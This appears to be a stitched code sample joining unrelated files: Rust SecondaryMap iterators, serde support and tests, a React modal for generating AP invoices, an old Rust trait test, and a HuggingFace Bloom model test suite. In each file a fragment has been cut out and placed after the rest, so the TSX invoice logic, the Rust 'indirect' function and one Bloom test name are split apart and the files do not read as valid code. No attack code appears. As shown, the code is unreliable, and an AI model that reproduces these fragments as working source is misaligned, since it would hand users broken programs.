unsafe { slot.get_unchecked_mut() }
}
}
// Iterators.
/// A draining iterator for [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::drain`].
#[derive(Debug)]
pub struct Drain<'a, K: Key + 'a, V: 'a> {
num_left: usize,
sm: &'a mut SecondaryMap<K, V>,
cur: usize,
}
/// An iterator that moves key-value pairs out of a [`SecondaryMap`].
///
/// This iterator is created by calling the `into_iter` method on [`SecondaryMap`],
/// provided by the [`IntoIterator`] trait.
#[derive(Debug)]
pub struct IntoIter<K: Key, V> {
num_left: usize,
slots: Enumerate<alloc::vec::IntoIter<Slot<V>>>,
_k: PhantomData<fn(K) -> K>,
}
/// An iterator over the key-value pairs in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::iter`].
#[derive(Debug)]
pub struct Iter<'a, K: Key + 'a, V: 'a> {
num_left: usize,
slots: Enumerate<core::slice::Iter<'a, Slot<V>>>,
_k: PhantomData<fn(K) -> K>,
}
/// A mutable iterator over the key-value pairs in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::iter_mut`].
#[derive(Debug)]
pub struct IterMut<'a, K: Key + 'a, V: 'a> {
num_left: usize,
slots: Enumerate<core::slice::IterMut<'a, Slot<V>>>,
_k: PhantomData<fn(K) -> K>,
}
/// An iterator over the keys in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::keys`].
#[derive(Debug)]
pub struct Keys<'a, K: Key + 'a, V: 'a> {
inner: Iter<'a, K, V>,
}
/// An iterator over the values in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::values`].
#[derive(Debug)]
pub struct Values<'a, K: Key + 'a, V: 'a> {
inner: Iter<'a, K, V>,
}
/// A mutable iterator over the values in a [`SecondaryMap`].
///
/// This iterator is created by [`SecondaryMap::values_mut`].
#[derive(Debug)]
pub struct ValuesMut<'a, K: Key + 'a, V: 'a> {
inner: IterMut<'a, K, V>,
}
impl<'a, K: Key, V> Iterator for Drain<'a, K, V> {
type Item = (K, V);
fn next(&mut self) -> Option<(K, V)> {
let len = self.sm.slots.len();
while self.cur < len {
let idx = self.cur;
self.cur += 1;
let slot = unsafe { self.sm.slots.get_unchecked_mut(idx) };
if let Occupied { value, version } = replace(slot, Slot::new_vacant()) {
self.sm.num_elems -= 1;
self.num_left -= 1;
let key = KeyData::new(idx as u32, version.get()).into();
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Drop for Drain<'a, K, V> {
fn drop(&mut self) {
self.for_each(|_drop| {});
}
}
impl<K: Key, V> Iterator for IntoIter<K, V> {
type Item = (K, V);
fn next(&mut self) -> Option<(K, V)> {
while let Some((idx, mut slot)) = self.slots.next() {
if let Occupied { value, version } = replace(&mut slot, Slot::new_vacant()) {
self.num_left -= 1;
let key = KeyData::new(idx as u32, version.get()).into();
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Iterator for Iter<'a, K, V> {
type Item = (K, &'a V);
fn next(&mut self) -> Option<(K, &'a V)> {
while let Some((idx, slot)) = self.slots.next() {
if let Occupied { value, version } = slot {
self.num_left -= 1;
let key = KeyData::new(idx as u32, version.get()).into();
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Iterator for IterMut<'a, K, V> {
type Item = (K, &'a mut V);
fn next(&mut self) -> Option<(K, &'a mut V)> {
while let Some((idx, slot)) = self.slots.next() {
if let Occupied { value, version } = slot {
let key = KeyData::new(idx as u32, version.get()).into();
self.num_left -= 1;
return Some((key, value));
}
}
None
}
fn size_hint(&self) -> (usize, Option<usize>) {
(self.num_left, Some(self.num_left))
}
}
impl<'a, K: Key, V> Iterator for Keys<'a, K, V> {
type Item = K;
fn next(&mut self) -> Option<K> {
self.inner.next().map(|(key, _)| key)
}
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
impl<'a, K: Key, V> Iterator for Values<'a, K, V> {
type Item = &'a V;
fn next(&mut self) -> Option<&'a V> {
self.inner.next().map(|(_, value)| value)
}
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
impl<'a, K: Key, V> Iterator for ValuesMut<'a, K, V> {
type Item = &'a mut V;
fn next(&mut self) -> Option<&'a mut V> {
self.inner.next().map(|(_, value)| value)
}
fn size_hint(&self) -> (usize, Option<usize>) {
self.inner.size_hint()
}
}
impl<'a, K: Key, V> IntoIterator for &'a SecondaryMap<K, V> {
type Item = (K, &'a V);
type IntoIter = Iter<'a, K, V>;
fn into_iter(self) -> Self::IntoIter {
self.iter()
}
}
impl<'a, K: Key, V> IntoIterator for &'a mut SecondaryMap<K, V> {
type Item = (K, &'a mut V);
type IntoIter = IterMut<'a, K, V>;
fn into_iter(self) -> Self::IntoIter {
self.iter_mut()
}
}
impl<K: Key, V> IntoIterator for SecondaryMap<K, V> {
type Item = (K, V);
type IntoIter = IntoIter<K, V>;
fn into_iter(self) -> Self::IntoIter {
let len = self.len();
let mut it = self.slots.into_iter().enumerate();
it.next(); // Skip sentinel.
IntoIter {
num_left: len,
slots: it,
_k: PhantomData,
}
}
}
impl<'a, K: Key, V> FusedIterator for Iter<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for IterMut<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for Keys<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for Values<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for ValuesMut<'a, K, V> {}
impl<'a, K: Key, V> FusedIterator for Drain<'a, K, V> {}
impl<K: Key, V> FusedIterator for IntoIter<K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Iter<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for IterMut<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Keys<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Values<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for ValuesMut<'a, K, V> {}
impl<'a, K: Key, V> ExactSizeIterator for Drain<'a, K, V> {}
impl<K: Key, V> ExactSizeIterator for IntoIter<K, V> {}
// Serialization with serde.
#[cfg(feature = "serde")]
mod serialize {
use super::*;
use serde::{de, Deserialize, Deserializer, Serialize, Serializer};
#[derive(Serialize, Deserialize)]
struct SerdeSlot<T> {
value: Option<T>,
version: u32,
}
impl<T: Serialize> Serialize for Slot<T> {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
let serde_slot = SerdeSlot {
version: self.version(),
value: match self {
Occupied { value, .. } => Some(value),
Vacant => None,
},
};
serde_slot.serialize(serializer)
}
}
impl<'de, T> Deserialize<'de> for Slot<T>
where
T: Deserialize<'de>,
{
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: Deserializer<'de>,
{
let serde_slot: SerdeSlot<T> = Deserialize::deserialize(deserializer)?;
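            // Occupied slots always have an odd version (see Slot::new_occupied),
            // so the version's parity must agree with the presence of a value.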
let occupied = serde_slot.version % 2 == 1;
if occupied ^ serde_slot.value.is_some() {
return Err(de::Error::custom(&"inconsistent occupation in Slot"));
}
Ok(match serde_slot.value {
Some(value) => Self::new_occupied(serde_slot.version, value),
None => Self::new_vacant(),
})
}
}
impl<K: Key, V: Serialize> Serialize for SecondaryMap<K, V> {
fn serialize<S>(&self, serializer: S) -> Result<S::Ok, S::Error>
where
S: Serializer,
{
self.slots.serialize(serializer)
}
}
impl<'de, K: Key, V: Deserialize<'de>> Deserialize<'de> for SecondaryMap<K, V> {
fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
where
D: Deserializer<'de>,
{
let mut slots: Vec<Slot<V>> = Deserialize::deserialize(deserializer)?;
if slots.len() >= (u32::max_value() - 1) as usize {
return Err(de::Error::custom(&"too many slots"));
}
// Ensure the first slot exists and is empty for the sentinel.
if slots.get(0).map_or(true, |slot| slot.occupied()) {
return Err(de::Error::custom(&"first slot not empty"));
}
slots[0] = Slot::new_vacant();
let num_elems = slots.iter().map(|s| s.occupied() as usize).sum();
Ok(Self {
num_elems,
slots,
_k: PhantomData,
})
}
}
}
#[cfg(test)]
mod tests {
use crate::*;
use quickcheck::quickcheck;
use std::collections::HashMap;
#[cfg(all(nightly, feature = "unstable"))]
#[test]
fn disjoint() {
// Intended to be run with miri to find any potential UB.
let mut sm = SlotMap::new();
let mut sec = SecondaryMap::new();
// Some churn.
for i in 0..20usize {
sm.insert(i);
}
sm.retain(|_, i| *i % 2 == 0);
for (i, k) in sm.keys().enumerate() {
sec.insert(k, i);
}
let keys: Vec<_> = sm.keys().collect();
for i in 0..keys.len() {
for j in 0..keys.len() {
if let Some([r0, r1]) = sec.get_disjoint_mut([keys[i], keys[j]]) {
*r0 ^= *r1;
*r1 = r1.wrapping_add(*r0);
} else {
assert!(i == j);
}
}
}
for i in 0..keys.len() {
for j in 0..keys.len() {
for k in 0..keys.len() {
if let Some([r0, r1, r2]) = sec.get_disjoint_mut([keys[i], keys[j], keys[k]]) {
*r0 ^= *r1;
*r0 = r0.wrapping_add(*r2);
*r1 ^= *r0;
*r1 = r1.wrapping_add(*r2);
*r2 ^= *r0;
*r2 = r2.wrapping_add(*r1);
} else {
assert!(i == j || j == k || i == k);
}
}
}
}
}
quickcheck! {
fn qc_secmap_equiv_hashmap(operations: Vec<(u8, u32)>) -> bool {
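            // Drive a SlotMap + SecondaryMap and a HashMap with the same random
            // operation stream and check they remain observationally equivalent.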
let mut hm = HashMap::new();
let mut hm_keys = Vec::new();
let mut unique_key = 0u32;
let mut sm = SlotMap::new();
let mut sec = SecondaryMap::new();
let mut sm_keys = Vec::new();
#[cfg(not(feature = "serde"))]
let num_ops = 4;
#[cfg(feature = "serde")]
let num_ops = 5;
for (op, val) in operations {
match op % num_ops {
// Insert.
0 => {
hm.insert(unique_key, val);
hm_keys.push(unique_key);
unique_key += 1;
let k = sm.insert(val);
sec.insert(k, val);
sm_keys.push(k);
}
// Delete.
1 => {
if hm_keys.is_empty() { continue; }
let idx = val as usize % hm_keys.len();
sm.remove(sm_keys[idx]);
if hm.remove(&hm_keys[idx]) != sec.remove(sm_keys[idx]) {
return false;
}
}
// Access.
2 => {
if hm_keys.is_empty() { continue; }
let idx = val as usize % hm_keys.len();
let (hm_key, sm_key) = (&hm_keys[idx], sm_keys[idx]);
if hm.contains_key(hm_key) != sec.contains_key(sm_key) ||
hm.get(hm_key) != sec.get(sm_key) {
return false;
}
}
// Clone.
3 => {
sec = sec.clone();
}
// Serde round-trip.
#[cfg(feature = "serde")]
4 => {
let ser = serde_json::to_string(&sec).unwrap();
sec = serde_json::from_str(&ser).unwrap();
}
_ => unreachable!(),
}
}
let mut secv: Vec<_> = sec.values().collect();
let mut hmv: Vec<_> = hm.values().collect();
secv.sort();
hmv.sort();
secv == hmv
}
}
}
|
clear
|
POInvoiceModal.tsx
|
import { Modal, TextField, withStyles } from '@kudoo/components';
import React, { useState } from 'react';
import { connect } from 'react-redux';
import { compose } from 'recompose';
import { showToast } from 'src/helpers/toast';
import { IPOResponse } from 'src/screens/inventory/PurchaseOrder/PbsPurchaseOrderTab/CreatePbsPO/PBSPOtypes';
import {
APINVOICE,
POSTATUS,
} from 'src/screens/inventory/PurchaseOrder/PurchaseOrder/types';
import { IReduxState } from 'src/store/reducers';
import { IProfileState } from 'src/store/reducers/profile';
import styles, { StyleKeys } from './styles';
type IProps = IRouteProps<StyleKeys> & {
onClose: () => void;
visible: boolean;
purchaseOrder: {
id?: string;
};
profile?: IProfileState;
createApInvoice?: ({}) => Promise<IPOResponse>;
updateApInvoice?: ({}) => Promise<IPOResponse>;
updatePurchaseOrder?: ({}) => Promise<IPOResponse>;
};
const POInvoiceModal: React.FC<IProps> = (props) => {
const {
onClose,
visible,
purchaseOrder,
createApInvoice,
updatePurchaseOrder,
} = props;
const [invoiceNumber, setInvoiceNumber] = useState('');
const [submitting, setSubmitting] = useState(false);
const isSubmitDisabled = !invoiceNumber || submitting;
const generateApInvoice = async () => {
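    // Create the AP invoice first; on success, mark the purchase order as
    // INVOICED before closing the modal.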
try {
setSubmitting(true);
const dataToSend = {
purchaseOrder: {
connect: {
id: purchaseOrder.id,
},
},
status: APINVOICE.OPEN,
invoiceNumber,
};
const apInvoiceRes = await createApInvoice({
data: dataToSend,
});
if (apInvoiceRes.success) {
const res = await updatePurchaseOrder({
data: {
status: POSTATUS.INVOICED,
},
where: { id: purchaseOrder.id },
});
|
showToast(null, 'Status Updated');
onClose();
} else {
res.error.forEach((err) => showToast(err));
onClose();
}
} else {
apInvoiceRes.error.forEach((err) => showToast(err));
onClose();
}
} catch (e) {
showToast(e.toString());
} finally {
setSubmitting(false);
}
};
return (
<Modal
visible={visible}
onClose={onClose}
showCloseButton
      title='Generate AP Invoice'
description={
<div>
<TextField
label={'Invoice Number'}
placeholder={'1234'}
name='invoiceNumber'
id='invoiceNumber'
value={String(invoiceNumber)}
onChange={(e) => {
setInvoiceNumber(e.target.value);
}}
/>
</div>
}
buttons={[
{
title: submitting ? 'Submitting...' : 'Submit',
onClick: generateApInvoice,
isDisabled: isSubmitDisabled,
loading: submitting,
},
]}
/>
);
};
POInvoiceModal.defaultProps = {
onClose: () => {},
purchaseOrder: {},
createApInvoice: () => ({} as any),
updateApInvoice: () => ({} as any),
updatePurchaseOrder: () => ({} as any),
};
export default compose<IProps, IProps>(
withStyles(styles),
// withUpdatePurchaseOrder(),
// withCreateApInvoice(),
// withUpdateApInvoice(),
connect((state: IReduxState) => ({
profile: state.profile,
})),
)(POInvoiceModal);
|
if (res.success) {
|
trait-to-str.rs
|
// Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
trait to_str {
fn to_string(&self) -> ~str;
}
impl to_str for int {
fn to_string(&self) -> ~str { self.to_str() }
}
impl<T:to_str> to_str for Vec<T> {
fn to_string(&self) -> ~str {
format!("[{}]", self.iter().map(|e| e.to_string()).collect::<Vec<~str>>().connect(", "))
}
}
pub fn main() {
assert!(1.to_string() == "1".to_owned());
assert!((vec!(2, 3, 4)).to_string() == "[2, 3, 4]".to_owned());
fn indirect<T:to_str>(x: T) -> ~str
|
assert!(indirect(vec!(10, 20)) == "[10, 20]!".to_owned());
fn indirect2<T:to_str>(x: T) -> ~str {
indirect(x)
}
assert!(indirect2(vec!(1)) == "[1]!".to_owned());
}
|
{
x.to_string() + "!"
}
|
test_modeling_bloom.py
|
# coding=utf-8
# Copyright 2022 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import math
import unittest
from transformers import BloomConfig, is_torch_available
from transformers.testing_utils import require_torch, require_torch_gpu, slow, torch_device
from ...generation.test_generation_utils import GenerationTesterMixin
from ...test_configuration_common import ConfigTester
from ...test_modeling_common import ModelTesterMixin, ids_tensor, random_attention_mask
if is_torch_available():
import torch
from transformers import (
BLOOM_PRETRAINED_MODEL_ARCHIVE_LIST,
BloomForCausalLM,
BloomForSequenceClassification,
BloomForTokenClassification,
BloomModel,
BloomTokenizerFast,
)
@require_torch
class BloomModelTester:
def __init__(
self,
parent,
batch_size=14,
seq_length=7,
is_training=True,
use_token_type_ids=False,
use_input_mask=True,
use_labels=True,
use_mc_token_ids=True,
vocab_size=99,
hidden_size=32,
num_hidden_layers=5,
num_attention_heads=4,
intermediate_size=37,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=16,
type_sequence_label_size=2,
initializer_range=0.02,
num_labels=3,
num_choices=4,
scope=None,
):
self.parent = parent
self.batch_size = batch_size
self.seq_length = seq_length
self.is_training = is_training
self.use_token_type_ids = use_token_type_ids
self.use_input_mask = use_input_mask
self.use_labels = use_labels
self.use_mc_token_ids = use_mc_token_ids
self.vocab_size = vocab_size
self.hidden_size = hidden_size
self.num_hidden_layers = num_hidden_layers
self.num_attention_heads = num_attention_heads
self.intermediate_size = intermediate_size
self.hidden_act = hidden_act
self.hidden_dropout_prob = hidden_dropout_prob
self.attention_probs_dropout_prob = attention_probs_dropout_prob
self.max_position_embeddings = max_position_embeddings
self.type_vocab_size = type_vocab_size
self.type_sequence_label_size = type_sequence_label_size
self.initializer_range = initializer_range
self.num_labels = num_labels
self.num_choices = num_choices
self.scope = None
self.bos_token_id = vocab_size - 1
self.eos_token_id = vocab_size - 1
self.pad_token_id = vocab_size - 1
def get_large_model_config(self):
return BloomConfig.from_pretrained("bigscience/bloom")
def prepare_config_and_inputs(self, gradient_checkpointing=False):
input_ids = ids_tensor([self.batch_size, self.seq_length], self.vocab_size)
input_mask = None
if self.use_input_mask:
input_mask = random_attention_mask([self.batch_size, self.seq_length])
sequence_labels = None
if self.use_labels:
sequence_labels = ids_tensor([self.batch_size], self.type_sequence_label_size)
config = self.get_config(gradient_checkpointing=gradient_checkpointing)
return (config, input_ids, input_mask, sequence_labels)
def get_config(self, gradient_checkpointing=False, slow_but_exact=True):
return BloomConfig(
vocab_size=self.vocab_size,
seq_length=self.seq_length,
hidden_size=self.hidden_size,
n_layer=self.num_hidden_layers,
n_head=self.num_attention_heads,
resid_pdrop=self.hidden_dropout_prob,
attn_pdrop=self.attention_probs_dropout_prob,
n_positions=self.max_position_embeddings,
type_vocab_size=self.type_vocab_size,
initializer_range=self.initializer_range,
use_cache=True,
bos_token_id=self.bos_token_id,
eos_token_id=self.eos_token_id,
pad_token_id=self.pad_token_id,
num_labels=self.num_labels,
gradient_checkpointing=gradient_checkpointing,
slow_but_exact=slow_but_exact,
dtype="float32",
)
def create_and_check_bloom_model(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
result = model(input_ids)
self.parent.assertEqual(result.last_hidden_state.shape, (self.batch_size, self.seq_length, self.hidden_size))
self.parent.assertEqual(len(result.past_key_values), config.n_layer)
def create_and_check_bloom_model_past(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
# first forward pass
outputs = model(input_ids, attention_mask=torch.ones_like(input_ids), use_cache=True)
outputs_use_cache_conf = model(input_ids, attention_mask=torch.ones_like(input_ids))
outputs_no_past = model(input_ids, use_cache=False, attention_mask=torch.ones_like(input_ids))
self.parent.assertTrue(len(outputs) == len(outputs_use_cache_conf))
self.parent.assertTrue(len(outputs) == len(outputs_no_past) + 1)
past = outputs["past_key_values"]
        # create hypothetical next token and extend to next_input_ids
next_tokens = ids_tensor((self.batch_size, 1), config.vocab_size)
# append to next input_ids and token_type_ids
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
output_from_no_past = model(next_input_ids)["last_hidden_state"]
output_from_past = model(next_tokens, past_key_values=past)["last_hidden_state"]
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -1, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, 0, random_slice_idx].detach()
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
def create_and_check_bloom_model_attention_mask_past(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
# create attention mask
attn_mask = torch.ones(input_ids.shape, dtype=torch.long, device=torch_device)
half_seq_length = self.seq_length // 2
attn_mask[:, half_seq_length:] = 0
# first forward pass
output, past = model(input_ids, attention_mask=attn_mask).to_tuple()
        # create hypothetical next token and extend to next_input_ids
next_tokens = ids_tensor((self.batch_size, 1), config.vocab_size)
# change a random masked slice from input_ids
random_seq_idx_to_change = ids_tensor((1,), half_seq_length).item() + 1
random_other_next_tokens = ids_tensor((self.batch_size, 1), config.vocab_size).squeeze(-1)
input_ids[:, -random_seq_idx_to_change] = random_other_next_tokens
# append to next input_ids and attn_mask
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
attn_mask = torch.cat(
[attn_mask, torch.ones((attn_mask.shape[0], 1), dtype=torch.long, device=torch_device)],
dim=1,
)
# get two different outputs
output_from_no_past = model(next_input_ids, attention_mask=attn_mask)["last_hidden_state"]
output_from_past = model(next_tokens, past_key_values=past, attention_mask=attn_mask)["last_hidden_state"]
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -1, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, 0, random_slice_idx].detach()
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
def create_and_check_bloom_model_past_large_inputs(self, config, input_ids, input_mask, *args):
model = BloomModel(config=config)
model.to(torch_device)
model.eval()
# first forward pass
outputs = model(input_ids, attention_mask=input_mask, use_cache=True)
output, past = outputs.to_tuple()
        # create hypothetical next token and extend to next_input_ids
next_tokens = ids_tensor((self.batch_size, 3), config.vocab_size)
next_mask = ids_tensor((self.batch_size, 3), vocab_size=2)
# append to next input_ids and token_type_ids
next_input_ids = torch.cat([input_ids, next_tokens], dim=-1)
next_attention_mask = torch.cat([input_mask, next_mask], dim=-1)
output_from_no_past = model(next_input_ids, attention_mask=next_attention_mask)["last_hidden_state"]
output_from_past = model(next_tokens, attention_mask=next_attention_mask, past_key_values=past)[
"last_hidden_state"
]
self.parent.assertTrue(output_from_past.shape[1] == next_tokens.shape[1])
# select random slice
random_slice_idx = ids_tensor((1,), output_from_past.shape[-1]).item()
output_from_no_past_slice = output_from_no_past[:, -3:, random_slice_idx].detach()
output_from_past_slice = output_from_past[:, :, random_slice_idx].detach()
# test that outputs are equal for slice
self.parent.assertTrue(torch.allclose(output_from_past_slice, output_from_no_past_slice, atol=1e-3))
def create_and_check_lm_head_model(self, config, input_ids, input_mask, *args):
model = BloomForCausalLM(config)
model.to(torch_device)
model.eval()
result = model(input_ids, labels=input_ids)
self.parent.assertEqual(result.loss.shape, ())
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
def create_and_check_sequence_classification_model(self, config, input_ids, input_mask, *args):
config.num_labels = self.num_labels
model = BloomForSequenceClassification(config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.num_labels))
def create_and_check_token_classification_model(self, config, input_ids, input_mask, *args):
model = BloomForTokenClassification(config)
model.to(torch_device)
model.eval()
result = model(input_ids, attention_mask=input_mask)
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.num_labels))
def create_and_check_forward_and_backwards(
self, config, input_ids, input_mask, *args, gradient_checkpointing=False
):
model = BloomForCausalLM(config)
model.to(torch_device)
if gradient_checkpointing:
model.gradient_checkpointing_enable()
result = model(input_ids, labels=input_ids)
self.parent.assertEqual(result.loss.shape, ())
self.parent.assertEqual(result.logits.shape, (self.batch_size, self.seq_length, self.vocab_size))
result.loss.backward()
def create_and_check_bloom_weight_initialization(self, config, *args):
model = BloomModel(config)
model_std = model.config.initializer_range / math.sqrt(2 * model.config.n_layer)
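        # Output projection weights are expected to be initialized with the
        # scaled-down std initializer_range / sqrt(2 * n_layer); check mean and
        # std for each c_proj weight below.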
for key in model.state_dict().keys():
if "c_proj" in key and "weight" in key:
self.parent.assertLessEqual(abs(torch.std(model.state_dict()[key]) - model_std), 0.001)
self.parent.assertLessEqual(abs(torch.mean(model.state_dict()[key]) - 0.0), 0.01)
def prepare_config_and_inputs_for_common(self):
config_and_inputs = self.prepare_config_and_inputs()
config, input_ids, input_mask, sequence_labels = config_and_inputs
inputs_dict = {"input_ids": input_ids}
return config, inputs_dict
@require_torch
class BloomModelTest(ModelTesterMixin, GenerationTesterMixin, unittest.TestCase):
all_model_classes = (
(
BloomModel,
BloomForCausalLM,
BloomForSequenceClassification,
BloomForTokenClassification,
)
if is_torch_available()
else ()
)
all_generative_model_classes = (BloomForCausalLM,) if is_torch_available() else ()
fx_compatible = False
test_missing_keys = False
test_pruning = False
test_torchscript = True  # torch.autograd functions seem to be unsupported
def setUp(self):
self.model_tester = BloomModelTester(self)
self.config_tester = ConfigTester(self, config_class=BloomConfig, n_embd=37)
def test_config(self):
self.config_tester.run_common_tests()
def test_bloom_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model(*config_and_inputs)
def test_bloom_model_past(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model_past(*config_and_inputs)
def test_bloom_model_att_mask_past(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model_attention_mask_past(*config_and_inputs)
def test_bloom_model_past_large_inputs(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_model_past_large_inputs(*config_and_inputs)
def test_bloom_lm_head_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_lm_head_model(*config_and_inputs)
def test_bloom_sequence_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_sequence_classification_model(*config_and_inputs)
def test_bloom_token_classification_model(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_token_classification_model(*config_and_inputs)
def test_bloom_gradient_checkpointing(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_forward_and_backwards(*config_and_inputs, gradient_checkpointing=True)
def test_bloom_weight_initialization(self):
config_and_inputs = self.model_tester.prepare_config_and_inputs()
self.model_tester.create_and_check_bloom_weight_initialization(*config_and_inputs)
@slow
def test_model_from_pretrained(self):
for model_name in BLOOM_PRETRAINED_MODEL_ARCHIVE_LIST[:1]:
model = BloomModel.from_pretrained(model_name)
self.assertIsNotNone(model)
@slow
@require_torch_gpu
def test_simple_generation(self):
path_350m = "bigscience/bloom-350m"
model = BloomForCausalLM.from_pretrained(path_350m, torch_dtype="auto", use_cache=True).cuda()
model = model.eval()
tokenizer = BloomTokenizerFast.from_pretrained(path_350m)
input_sentence = "I enjoy walking with my cute dog"
EXPECTED_OUTPUT = (
"I enjoy walking with my cute dog, and I love to watch the kids play. I am a very active person, and I am"
" a very good listener. I am a very good person, and I am a very good person. I am a"
)
input_ids = tokenizer.encode(input_sentence, return_tensors="pt")
greedy_output = model.generate(input_ids.cuda(), max_length=50)
self.assertEqual(tokenizer.decode(greedy_output[0], skip_special_tokens=True), EXPECTED_OUTPUT)
@slow
@require_torch_gpu
def
|
(self):
path_350m = "bigscience/bloom-350m"
model = BloomForCausalLM.from_pretrained(path_350m, torch_dtype="auto", use_cache=True).cuda()
model = model.eval()
tokenizer = BloomTokenizerFast.from_pretrained(path_350m, padding_side="left")
input_sentence = ["I enjoy walking with my cute dog", "I enjoy walking with my cute dog"]
input_ids = tokenizer.batch_encode_plus(input_sentence, return_tensors="pt", padding=True)
greedy_output = model.generate(
input_ids["input_ids"].cuda(), attention_mask=input_ids["attention_mask"], max_length=50, do_sample=False
)
self.assertEqual(
tokenizer.decode(greedy_output[0], skip_special_tokens=True),
tokenizer.decode(greedy_output[1], skip_special_tokens=True),
)
@slow
@require_torch_gpu
def test_batch_generation_padd(self):
path_350m = "bigscience/bloom-350m"
model = BloomForCausalLM.from_pretrained(path_350m, torch_dtype="auto", use_cache=True).cuda()
model = model.eval()
tokenizer = BloomTokenizerFast.from_pretrained(path_350m, padding_side="left")
input_sentence = ["I enjoy walking with my cute dog", "Hello my name is"]
input_sentence_without_pad = "Hello my name is"
input_ids = tokenizer.batch_encode_plus(input_sentence, return_tensors="pt", padding=True)
input_ids_without_pad = tokenizer.encode(input_sentence_without_pad, return_tensors="pt")
greedy_output = model.generate(
input_ids["input_ids"].cuda(), attention_mask=input_ids["attention_mask"], max_length=50, do_sample=False
)
greedy_output_without_pad = model.generate(input_ids_without_pad.cuda(), max_length=50, do_sample=False)
# test token values: the padded row carries 3 left-pad tokens, hence the offset of 3
self.assertEqual(greedy_output[-1, 3:].tolist(), greedy_output_without_pad[0, :-3].tolist())
# test reconstructions
self.assertEqual(
tokenizer.decode(greedy_output[-1, 3:], skip_special_tokens=True),
tokenizer.decode(greedy_output_without_pad[0, :-3], skip_special_tokens=True),
)
@require_torch
class BloomEmbeddingTest(unittest.TestCase):
"""
The goal here is to compare the embeddings generated by a model trained
with Megatron-LM against those produced by the transformers library, using a small
GPT2-like model, to ensure that the conversion from Megatron-LM to transformers was successful.
The script compares the logits of the embedding layer and the transformer layers.
WARNING: these logits are not expected to have exactly the same statistics when the
code runs on CPU versus GPU. For more info, please visit:
- https://github.com/pytorch/pytorch/issues/76052#issuecomment-1103193548
- https://discuss.pytorch.org/t/reproducibility-issue-between-intel-and-amd-cpus/144779/9
You need to install tokenizers following this readme:
- https://huggingface.co/bigscience-catalogue-data-dev/byte-level-bpe-tokenizer-no-norm-250k-whitespace-and-eos-regex-alpha-v3-dedup-lines-articles
Tokenizer used during training:
